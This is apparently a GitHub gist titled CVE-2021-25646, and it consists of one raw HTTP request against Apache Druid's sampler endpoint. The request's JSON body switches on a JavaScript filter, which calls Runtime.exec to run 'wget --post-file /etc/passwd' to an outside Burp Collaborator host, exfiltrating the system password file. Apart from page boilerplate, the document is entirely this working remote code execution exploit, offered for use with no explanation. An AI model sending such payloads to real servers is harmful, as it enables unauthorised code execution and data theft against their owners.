POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
"function": "function(value){return java.lang.Runtime.getRuntime().exec('wget --post-file /etc/passwd burpcollaborator.net')}",
"dimension": "added",
"": {
"enabled": "true"
}
}
}
},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
Last active
January 10, 2022 12:32
-
-
Save pikpikcu/d208f19ea222efe21c4a6e6003d57069 to your computer and use it in GitHub Desktop.
CVE-2021-25646
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment